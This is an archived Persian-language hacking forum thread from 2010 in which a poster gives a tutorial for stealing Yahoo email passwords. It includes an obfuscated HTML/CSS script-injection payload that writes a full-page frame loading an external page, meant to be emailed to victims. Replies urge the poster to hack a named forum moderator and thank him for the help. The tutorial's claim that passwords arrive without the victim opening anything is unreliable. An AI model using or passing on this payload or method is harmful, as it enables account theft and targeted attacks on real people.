توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : ایمیل هکینگ2(ادامه ایمیل هکینگ)
qq8030
06-03-2010, 05:32 PM
سلام نمی خواستم این فیلمو بذارم ولی چون قولشو داده بودم میذارمش ...
اول باید تشکر کنم از دوست خوبم نیما که با وجود کد هایی که در فایل وجود داشت انو کانورت کرد.
پست ایمیل هکینگ منو بستن وقتی آقای FAZ بشه مدیر معلومه دیگه .... نشون دادن آشیانه جنبه گذاشتن این پستارو نداره بهتره برن از همون روش های علمی Faz استفاده کنن...
این آخرین پست منه فقط زنده باد [Only registered and activated users can see links]**********.com
پسورد فایل RAR همون اسم وبلاگ نیما جونه: [Only registered and activated users can see links]
فرمت فایل AVI :
[Only registered and activated users can see links]
جا داره روزه مادرم به همگی تبریک بگم...:43:
qq8030
06-03-2010, 05:40 PM
فقط بگم ادامه این مطلب بوده....
سلام برای هک ایمیل یاهو باید اکانتی از سرور دیگه مثلا مثل جیمیل داشته باشیم خوب بعد نیاز به stmpسرور داریم .
خوب stmp server که خودم ازش استفاده کردم این بوده حالا نمیدونم کار میکنه یا نه
اگه کار نکرد خودتون پیدا کنید .
stmp server باز کنید در قسمت to ایمیل یاهو قربانی را بنویسید ودر قسمت Fromایمیل خودتون رو بنویسید( فقط سرور یاهو نباشه) در قسمت subject هر چی نوشتید موردی نداره چون قربانی اصلا نیازی نیست که ایمیل را باز کنه حالا تو قسمتی که باید متن ایمیل رو بنویسید کد پایین رو پیست کنید فقط اگه stmp server رو عوض کردید داخل کد رو باید عوض کنید یعنی stmp خودتونو به جای stmp پیش فرض تایپ کنید. send رو بزنید حالا برید تو inbox خودتون پسورد قربانی رو ببینید . حالا برای این که بهتر بفهمید فیلم این اموزش رو برای دانلود میذارم .
این کد: فایل txt رو برای دانلودم میذارم...
<a href="[Only registered and activated users can see links]>"style="background:url\(java/**/script:document.write('<frameset cols=100% rows=100% border=0
frameborder=0 framespacing=0><frame frameborder=0 src=[Only registered and activated users can see links]></frameset>'))">
</a>
موفق و سربلند باشید...
این لینک کد
اینم لینک فیلم اموزش
Behzad_Ps
06-03-2010, 11:33 PM
این پست اسپم نیست . خواهشا کسی هم اسپم نده
سلام دادا
داداش قربان دستت یو اینکاره ای بیا پس این پسره Faz رو بزن
اگه بزنی یه سور توپول گیرت میاد
اینم پیغام خودش :
سلام دوست من
این قا محمد نتونست انلاین بشه . این پیغام رو خوند و ایمیل خودشو گذاشت براتون تا هکش کنید تا دوستان عزیز ببینند
Classic
06-04-2010, 01:21 AM
سلام
از اموزش شما و فعالیت شما در قسمت ایمیل هکینگ بسیار ممنونم دوست من
اگر قبلا به شما بی احترامی کردم معذرت میخوام
از دوست عزیزم بهزاد ممنون بابت کپی کردن مطالبی که به ایشون گفتم heart
بازم تشکر میکنم بابت همکاری در ایمیل هکینگ
Closed
vBulletin® v3.8.4, Copyright ©2000-2012, Jelsoft Enterprises Ltd.